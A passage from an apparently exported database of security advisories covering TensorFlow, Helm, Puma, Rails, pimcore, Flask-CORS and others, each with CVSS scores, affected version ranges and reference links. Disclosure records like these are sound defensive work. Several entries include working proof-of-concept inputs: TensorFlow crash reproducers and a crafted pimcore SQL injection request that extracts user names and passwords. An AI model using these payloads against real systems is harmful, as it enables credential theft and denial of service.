3.2.0), the command `helm lint` will fail with an error if the `lookup` function is used in a chart. Therefore, run `helm lint` on an untrusted chart before running `helm template`. + +Alternately, setting the `KUBECONFIG` environment variable to point to an empty Kubernetes configuration file will prevent unintended network connections. + +Finally, a chart may be manually analyzed for the presence of a `lookup` function in any file in the `templates/` directory. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [the Helm repository](https://github.com/helm/helm/issues) +* For security-specific issues, email us at [cncf-helm-security@lists.cncf.io](mailto:cncf-helm-security@lists.cncf.io)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.1.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/helm/helm/security/advisories/GHSA-q8q8-93cv-v6h8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11013'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/pull/7969'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/pull/7969/commits/c67b644a791a8fa61c760a3a0474533e63e74008'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/releases/tag/v3.2.0'}]","{'cwe_ids': ['CWE-200'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T21:15:16Z', 'nvd_published_at': None}" +1.4.0,GHSA-4fg4-p75j-w5xj,2021-05-18T21:42:27Z,2021-05-21T14:23:31Z,,['CVE-2021-29547'],Heap out of bounds in `QuantizedBatchNormWithGlobalNormalization`,"### Impact +An attacker can cause a segfault and denial of service via accessing data outside of bounds in `tf.raw_ops.QuantizedBatchNormWithGlobalNormalization`: + +```python +import tensorflow as tf + +t = tf.constant([1], shape=[1, 1, 1, 1], dtype=tf.quint8) +t_min = tf.constant([], shape=[0], dtype=tf.float32) +t_max = tf.constant([], shape=[0], dtype=tf.float32) +m = tf.constant([1], shape=[1], dtype=tf.quint8) +m_min = tf.constant([], shape=[0], dtype=tf.float32) +m_max = tf.constant([], shape=[0], dtype=tf.float32) +v = tf.constant([1], shape=[1], dtype=tf.quint8) +v_min = tf.constant([], shape=[0], dtype=tf.float32) +v_max = tf.constant([], shape=[0], dtype=tf.float32) +beta = tf.constant([1], shape=[1], dtype=tf.quint8) +beta_min = tf.constant([], shape=[0], dtype=tf.float32) +beta_max = tf.constant([], shape=[0], dtype=tf.float32) +gamma = tf.constant([1], shape=[1], dtype=tf.quint8) +gamma_min = tf.constant([], shape=[0], dtype=tf.float32) +gamma_max = tf.constant([], shape=[0], dtype=tf.float32) + +tf.raw_ops.QuantizedBatchNormWithGlobalNormalization( + t=t, t_min=t_min, t_max=t_max, m=m, m_min=m_min, m_max=m_max, + v=v, v_min=v_min, v_max=v_max, beta=beta, beta_min=beta_min, + beta_max=beta_max, gamma=gamma, gamma_min=gamma_min, + gamma_max=gamma_max, out_type=tf.qint32, + variance_epsilon=0.1, scale_after_normalization=True) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/55a97caa9e99c7f37a0bbbeb414dc55553d3ae7f/tensorflow/core/kernels/quantized_batch_norm_op.cc#L176-L189) assumes the inputs are not empty: + +```cc +const float input_min = context->input(1).flat()(0); +const float input_max = context->input(2).flat()(0); +... +const float mean_min = context->input(4).flat()(0); +const float mean_max = context->input(5).flat()(0); +... +const float var_min = context->input(7).flat()(0); +const float var_max = context->input(8).flat()(0); +... +const float beta_min = context->input(10).flat()(0); +const float beta_max = context->input(11).flat()(0); +... +const float gamma_min = context->input(13).flat()(0); +const float gamma_max = context->input(14).flat()(0); +``` + +If any of these inputs is empty, `.flat()` is an empty buffer, so accessing the element at index 0 is accessing data outside of bounds. + +### Patches +We have patched the issue in GitHub commit [d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b](https://github.com/tensorflow/tensorflow/commit/d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4fg4-p75j-w5xj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29547'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/d6ed5bcfe1dcab9e85a4d39931bd18d99018e75b'}]","{'cwe_ids': ['CWE-125'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:42:27Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-77xq-cpvg-7xm2,2023-09-05T22:45:47Z,2021-05-10T19:07:56Z,,['CVE-2020-7748'],Prototype pollution in @tsed/core,"This affects the package @tsed/core before 5.65.7. This vulnerability relates to the `deepExtend` function which is used as part of the utils directory. Depending on if user input is provided, an attacker can overwrite and pollute the object prototype of a program.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@tsed/core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.65.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7748'}, {'type': 'WEB', 'url': 'https://github.com/TypedProject/tsed/commit/1395773ddac35926cf058fc6da9fb8e82266761b'}, {'type': 'WEB', 'url': 'https://github.com/TypedProject/tsed/blob/production/packages/core/src/utils/deepExtends.ts%23L36'}, {'type': 'PACKAGE', 'url': 'https://github.com/tsedio/tsed'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TSEDCORE-1019382'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T17:41:36Z', 'nvd_published_at': '2020-10-20T11:15:00Z'}" +1.4.0,GHSA-58pf-pcwv-qg85,2022-08-02T18:03:17Z,2021-05-18T21:08:28Z,,['CVE-2020-7665'],Path traversal in u-root,This affects all versions of package github.com/u-root/u-root/pkg/uzip. It is vulnerable to both leading and non-leading relative path traversal attacks in zip file extraction.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/u-root/u-root'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7665'}, {'type': 'WEB', 'url': 'https://github.com/u-root/u-root/pull/1817'}, {'type': 'WEB', 'url': 'https://github.com/u-root/u-root/pull/2344'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMUROOTUROOTPKGUZIP-570441'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T20:51:25Z', 'nvd_published_at': None}" +1.4.0,GHSA-xc3p-ff3m-f46v,2023-08-31T16:42:28Z,2021-05-06T18:51:48Z,,['CVE-2020-25032'],Flask-Cors Directory Traversal vulnerability,An issue was discovered in Flask-CORS (aka CORS Middleware for Flask) before 3.0.9. It allows `../` directory traversal to access private resources because resource matching does not ensure that pathnames are in a canonical format.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Flask-Cors'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25032'}, {'type': 'WEB', 'url': 'https://github.com/corydolphin/flask-cors/commit/67c4b2cc98ae87cf1fa7df4f97fd81b40c79b895'}, {'type': 'PACKAGE', 'url': 'https://github.com/corydolphin/flask-cors'}, {'type': 'WEB', 'url': 'https://github.com/corydolphin/flask-cors/releases/tag/3.0.9'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4775'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00028.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00032.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00039.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00048.html'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:30:23Z', 'nvd_published_at': '2020-08-31T04:15:00Z'}" +1.4.0,GHSA-vpx7-vm66-qx8r,2022-01-04T19:33:01Z,2021-05-18T20:31:06Z,,['CVE-2020-7664'],Path Traversal in github.com/unknwon/cae/zip,"The ExtractTo function doesn't securely escape file paths in zip archives which include leading or non-leading "".."". This allows an attacker to add or replace files system-wide.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/unknwon/cae/zip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/unknwon/cae'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7664'}, {'type': 'WEB', 'url': 'https://github.com/unknwon/cae/commit/07971c00a1bfd9dc171c3ad0bfab5b67c2287e11'}, {'type': 'PACKAGE', 'url': 'https://github.com/unknwon/cae/'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0228'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMUNKNWONCAEZIP-570383'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T20:27:31Z', 'nvd_published_at': '2020-06-23T19:38:00Z'}" +1.4.0,GHSA-6g85-3hm8-83f9,2021-05-18T21:50:36Z,2021-05-21T14:23:22Z,,['CVE-2021-29544'],CHECK-fail in `QuantizeAndDequantizeV4Grad`,"### Impact +An attacker can trigger a denial of service via a `CHECK`-fail in `tf.raw_ops.QuantizeAndDequantizeV4Grad`: + +```python +import tensorflow as tf + +gradient_tensor = tf.constant([0.0], shape=[1]) +input_tensor = tf.constant([0.0], shape=[1]) +input_min = tf.constant([[0.0]], shape=[1, 1]) +input_max = tf.constant([[0.0]], shape=[1, 1]) + +tf.raw_ops.QuantizeAndDequantizeV4Grad( + gradients=gradient_tensor, input=input_tensor, + input_min=input_min, input_max=input_max, axis=0) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/95078c145b5a7a43ee046144005f733092756ab5/tensorflow/core/kernels/quantize_and_dequantize_op.cc#L162-L163) does not validate the rank of the `input_*` tensors. In turn, this results in the tensors being passes as they are to [`QuantizeAndDequantizePerChannelGradientImpl`](https://github.com/tensorflow/tensorflow/blob/95078c145b5a7a43ee046144005f733092756ab5/tensorflow/core/kernels/quantize_and_dequantize_op.h#L295-L306): + +```cc +template +struct QuantizeAndDequantizePerChannelGradientImpl { + static void Compute(const Device& d, + typename TTypes::ConstTensor gradient, + typename TTypes::ConstTensor input, + const Tensor* input_min_tensor, + const Tensor* input_max_tensor, + typename TTypes::Tensor input_backprop, + typename TTypes::Flat input_min_backprop, + typename TTypes::Flat input_max_backprop) { + ... + auto input_min = input_min_tensor->vec(); + auto input_max = input_max_tensor->vec(); + ... +} +``` + +However, the `vec` method, requires the rank to 1 and triggers a `CHECK` failure otherwise. + +### Patches +We have patched the issue in GitHub commit [20431e9044cf2ad3c0323c34888b192f3289af6b](https://github.com/tensorflow/tensorflow/commit/20431e9044cf2ad3c0323c34888b192f3289af6b). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2 as this is the only other affected version. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6g85-3hm8-83f9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29544'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/20431e9044cf2ad3c0323c34888b192f3289af6b'}]","{'cwe_ids': ['CWE-754'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T21:50:36Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-gh78-48h3-frjq,2022-07-11T19:22:01Z,2021-05-06T18:10:46Z,,['CVE-2020-13410'],Improper exception handling in Aedes,An issue was discovered in MoscaJS Aedes 0.42.0 and fixed in 0.42.1. lib/write.js does not properly consider exceptions during the writing of an invalid packet to a stream. ,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aedes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.42.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-13410'}, {'type': 'WEB', 'url': 'https://github.com/moscajs/aedes/pull/493'}, {'type': 'WEB', 'url': 'https://github.com/moscajs/aedes/commit/8d34ee5819cfc983d57e49b45d8c5ef70a76d79b'}, {'type': 'WEB', 'url': 'https://payatu.com/advisory/dos-in-aedes-mqtt-broker'}]","{'cwe_ids': ['CWE-755'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T20:02:28Z', 'nvd_published_at': '2020-08-26T15:15:00Z'}" +1.4.0,GHSA-q28m-8xjw-8vr5,2023-05-16T16:19:44Z,2021-05-18T01:27:15Z,,['CVE-2021-29509'],Puma's Keepalive Connections Causing Denial Of Service,"This vulnerability is related to [CVE-2019-16770](https://github.com/puma/puma/security/advisories/GHSA-7xx3-m584-x994). + +### Impact + +The fix for CVE-2019-16770 was incomplete. The original fix only protected existing connections that had already been accepted from having their requests starved by greedy persistent-connections saturating all threads in the same process. However, new connections may still be starved by greedy persistent-connections saturating all threads in all processes in the cluster. + +A `puma` server which received more concurrent `keep-alive` connections than the server had threads in its threadpool would service only a subset of connections, denying service to the unserved connections. + +### Patches + +This problem has been fixed in `puma` 4.3.8 and 5.3.1. + +### Workarounds + +Setting `queue_requests false` also fixes the issue. This is not advised when using `puma` without a reverse proxy, such as `nginx` or `apache`, because you will open yourself to slow client attacks (e.g. [slowloris](https://en.wikipedia.org/wiki/Slowloris_(computer_security))). + +The fix is very small. [A git patch is available here](https://gist.github.com/nateberkopec/4b3ea5676c0d70cbb37c82d54be25837) for those using [unsupported versions](https://github.com/puma/puma/security/policy#supported-versions) of Puma. + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue in [Puma](https://github.com/puma/puma). +* To report problems with this fix or to report another vulnerability, see [our security policy.](https://github.com/puma/puma/security/policy) + +### Acknowledgements + +Thank you to @MSP-Greg, @wjordan and @evanphx for their review on this issue. + +Thank you to @ioquatix for providing a modified fork of `wrk` which made debugging this issue much easier.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.3.7'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'puma'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.3.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/puma/puma/security/advisories/GHSA-q28m-8xjw-8vr5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29509'}, {'type': 'WEB', 'url': 'https://gist.github.com/nateberkopec/4b3ea5676c0d70cbb37c82d54be25837'}, {'type': 'PACKAGE', 'url': 'https://github.com/puma/puma'}, {'type': 'WEB', 'url': 'https://github.com/puma/puma/security/policy'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/puma/CVE-2021-29509.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/08/msg00015.html'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/puma'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202208-28'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T01:26:55Z', 'nvd_published_at': '2021-05-11T17:15:00Z'}" +1.4.0,GHSA-8jmh-c6vr-pmvm,2021-04-20T17:18:14Z,2021-05-06T18:53:55Z,,['CVE-2020-7759'],SQL Injection in pimcore,"""The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{""keyId""%3a""''"",""groupId""%3a""'asd'))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,'',11,12,'',14+from+users)+--+""}]""","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.7.2'}, {'fixed': '6.8.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7759'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/7315'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PHP-PIMCOREPIMCORE-1017405'}]","{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T17:18:14Z', 'nvd_published_at': '2020-10-30T11:15:00Z'}" +1.4.0,GHSA-58v3-j75h-xr49,2021-05-17T15:26:35Z,2021-05-18T15:44:30Z,,['CVE-2017-18367'],Improper Input Validation in libseccomp-golang,libseccomp-golang 0.9.0 and earlier incorrectly generates BPFs that OR multiple arguments rather than ANDing them. A process running under a restrictive seccomp filter that specified multiple syscall arguments could bypass intended access restrictions by specifying a single matching argument.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/seccomp/libseccomp-golang'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.9.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-18367'}, {'type': 'WEB', 'url': 'https://github.com/seccomp/libseccomp-golang/issues/22'}, {'type': 'WEB', 'url': 'https://github.com/seccomp/libseccomp-golang/commit/06e7a29f36a34b8cf419aeb87b979ee508e58f9e'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:4087'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2019:4090'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00016.html'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4574-1/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2019/04/25/6'}]","{'cwe_ids': ['CWE-284'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T15:26:35Z', 'nvd_published_at': None}" +1.4.0,GHSA-5hq2-xf89-9jxq,2023-08-08T15:56:26Z,2021-05-05T19:48:29Z,,['CVE-2021-22903'],Possible Open Redirect Vulnerability in Action Pack,"There is a possible Open Redirect Vulnerability in Action Pack. + +Versions Affected: >= v6.1.0.rc2 +Not affected: < v6.1.0.rc2 +Fixed Versions: 6.1.3.2 + +Impact +------ +This is similar to CVE-2021-22881. Specially crafted Host headers in combination with certain ""allowed host"" formats can cause the Host Authorization middleware in Action Pack to redirect users to a malicious +website. + +Since rails/rails@9bc7ea5, strings in config.hosts that do not have a leading dot are converted to regular expressions without proper escaping. This causes, for example, config.hosts << ""sub.example.com"" to permit a request with a Host header value of sub-example.com. + + +Releases +-------- +The fixed releases are available at the normal locations. + +Workarounds +----------- +The following monkey patch put in an initializer can be used as a workaround. + +```ruby +class ActionDispatch::HostAuthorization::Permissions + def sanitize_string(host) + if host.start_with?(""."") + /\A(.+\.)?#{Regexp.escape(host[1..-1])}\z/i + else + /\A#{Regexp.escape host}\z/i + end + end +end +``` + +Patches +------- +To aid users who aren't able to upgrade immediately we have provided patches for the two supported release series. They are in git-am format and consist of a single changeset. + +* 6-1-open-redirect.patch - Patch for 6.1 series + +Please note that only the 6.1.Z, 6.0.Z, and 5.2.Z series are supported at present. Users of earlier unsupported releases are advised to upgrade as soon as possible as we cannot guarantee the continued availability of security fixes for unsupported releases. + +Credits +------- + +Thanks Jonathan Hefner (https://hackerone.com/jonathanhefner) for reporting this bug!","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'actionpack'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0.rc2'}, {'fixed': '6.1.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22903'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1148025'}, {'type': 'WEB', 'url': 'https://discuss.rubyonrails.org/t/cve-2021-22903-possible-open-redirect-vulnerability-in-action-pack/77867'}, {'type': 'WEB', 'url': 'https://github.com/rails/rails/releases/tag/v6.1.3.2'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/actionpack/CVE-2021-22903.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/8TxqXEtgSF0'}]","{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:47:50Z', 'nvd_published_at': '2021-06-11T16:15:00Z'}" +1.4.0,GHSA-mv78-g7wq-mhp4,2021-05-18T17:18:34Z,2021-05-21T14:26:41Z,,['CVE-2021-29585'],Division by zero in padding computation in TFLite,"### Impact +The TFLite computation for size of output after padding, [`ComputeOutSize`](https://github.com/tensorflow/tensorflow/blob/0c9692ae7b1671c983569e5d3de5565843d500cf/tensorflow/lite/kernels/padding.h#L43-L55), does not check that the `stride` argument is not 0 before doing the division. + +```cc +inline int ComputeOutSize(TfLitePadding padding, int image_size, + int filter_size, int stride, int dilation_rate = 1) { + int effective_filter_size = (filter_size - 1) * dilation_rate + 1; + switch (padding) { + case kTfLitePaddingSame: + return (image_size + stride - 1) / stride; + case kTfLitePaddingValid: + return (image_size + stride - effective_filter_size) / stride; + default: + return 0; + } +} +``` + +Users can craft special models such that `ComputeOutSize` is called with `stride` set to 0. + +### Patches +We have patched the issue in GitHub commit [49847ae69a4e1a97ae7f2db5e217c77721e37948](https://github.com/tensorflow/tensorflow/commit/49847ae69a4e1a97ae7f2db5e217c77721e37948). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mv78-g7wq-mhp4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29585'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/49847ae69a4e1a97ae7f2db5e217c77721e37948'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T17:18:34Z', 'nvd_published_at': 